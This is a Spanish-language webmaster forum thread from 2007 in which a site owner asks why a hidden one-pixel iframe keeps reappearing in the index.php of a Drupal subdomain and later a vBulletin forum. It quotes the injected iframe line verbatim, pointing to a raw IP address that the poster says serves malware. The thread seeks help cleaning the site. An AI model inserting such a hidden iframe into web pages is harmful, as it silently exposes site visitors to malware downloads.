Autor Tema: iframe que se me cuela en el index  (Leído 3353 veces)

Desconectado metatop

  • Newbie
  • *
  • Mensajes: 9
    • Cantidubi.com
iframe que se me cuela en el index
« en: 15 de Junio de 2007, 10:26:44 pm »
Hola a todos, me estreno en el foro aunque hacia bastante tiempo que visitaba la web.

La verdad es que no sabía donde hacer ésta consulta, dudaba entre aquí y la zona de webmaster, pero como supongo que es tema de seguridad...
Bueno, al tema...que me enrollo:
me han dejado un subdomino para instalar una web y hacer unas pruebas, he usado el CMS de drupal y lo he instalado sin problemas, al cabo de unas horas vuelvo a entrar a la web y me sale un mensaje de error:
Código: [Seleccionar]
Parse error: syntax error, unexpected '<' in /home/adm/domains/forotecnico.org/public_html/elect/index.php on line 38
con lo cual no puedo entrar a la web, cojo el FTP (uso el Filezzilla) y me voy al index.php para ver que hay en la linea 38 y me encuentro con ésto:
Código: [Seleccionar]
<iframe src='http://81.95.145.240/logo/index.php' width='1' height='1' style='visibility: hidden;'></iframe>
Lo borro y ya me funciona otra vez la web, al cabo de unas horas vuelvo y ya está de nuevo el dichoso iframe, en ésta ocasión lo que hago es ponerle al principio dos barras para que el php lo tome como un comentario con lo cual evito que se vuelva a instalar solo.

He rastreado esa ip y me lleva a Panamá, so soy de España, pero bueno, yo lo que me pregunto es como es posible que se añada esa línea sola, imagino que será algún problema de seguridad, pero mia o del servidor???, mía no creo ya que tengo otros sitios en otros servidores con el mismo CMS y no tengo ese problema.

el archivo index.php lo tengo con permisos 644 igual que en las demás web que tengo.
Alguien me puede ayudar a descubrir donde está el problema.
Eternamente agradecido.

Desconectado Liamngls

  • Administrator
  • ******
  • Mensajes: 15688
    • Manuales-e
Re: iframe que se me cuela en el index
« Respuesta #1 en: 15 de Junio de 2007, 10:43:13 pm »
Es un tema extraño, movemos el tema al foro de Webmasters a ver que te comentan los compañeros.

Desconectado Piero

  • Member
  • ***
  • Mensajes: 183
Re: iframe que se me cuela en el index
« Respuesta #2 en: 16 de Junio de 2007, 09:21:39 am »
Hola

Quizás haya alguna relación con esta noticia
¿has hablado con el servicio técnico de tu servidor?
Olympus  E 510  -  gran angular: 9-18mm -  zoom medio: 14-54  -  macro: 50  -  tele: 45-150

Desconectado metatop

  • Newbie
  • *
  • Mensajes: 9
    • Cantidubi.com
Re: iframe que se me cuela en el index
« Respuesta #3 en: 16 de Junio de 2007, 12:16:14 pm »
 :???: La verdad es que no sé si tendrá algo que ver, de seguridad estoy pegado, ya digo que es un subdominio que me ha dejado un amigo y no tengo contacto con el hosting, se lo comunicaré a mi amigo, es que queria argumentos para comentárselo.
Yo deduzco que el servidor tiene algún agujero y que alguien tiene acceso para poder meter ese código para poder abrir esa dirección (ip), yo he intentado abrir esa dirección directamente para ver si el antivirus me detectaba algo, quizás haya cometido una impudencia pero el antivirus no detecta nada, se abre una página en blanco y no veo que pase nada pero es posible que se cuele algo??? :-o

Desconectado Liamngls

  • Administrator
  • ******
  • Mensajes: 15688
    • Manuales-e
Re: iframe que se me cuela en el index
« Respuesta #4 en: 16 de Junio de 2007, 02:33:44 pm »
¿Tienes en esa página algún script de un sitio ajeno? Un contador de visitas, por ejemplo.... podría ser eso.

Desconectado metatop

  • Newbie
  • *
  • Mensajes: 9
    • Cantidubi.com
Re: iframe que se me cuela en el index
« Respuesta #5 en: 16 de Junio de 2007, 02:49:53 pm »
Lo que es el subdominio donde he instalado la web no hay ningún script raro, no contador, ni nada. En el dominio principal no lo sé. En el dominio principal hay solamente un foro en Vvulettin y no tengo claro que afecte a un subdominio, no?

Desconectado metatop

  • Newbie
  • *
  • Mensajes: 9
    • Cantidubi.com
Re: iframe que se me cuela en el index
« Respuesta #6 en: 25 de Junio de 2007, 12:28:59 pm »
Hemos estado un poco y también se nos cuela en el index del foro, los del servidor dicen que no es problerma suyo, debe ser algo que se ha colado en nuestro espacio por algún agujero, de momento hemos actualizado el foro con los últimos parches pero el bicho lo tenemos dentro.
Lo que hace el bicho es intentar redirijir la página a la ip mencionada para descargar virus o badware.
Partiendo de que el bicho lo tenemos dentro ¿como lo localizo?¿se trata de algún scrit?¿hay alguna herramienta para pasarle al servidor como si de un antivirus normal se tratara?

gracias por las molestias :???:

 

Aviso Legal | Política de Privacidad | Política de Cookies

el contenido de la web se rige bajo licencia
Creative Commons License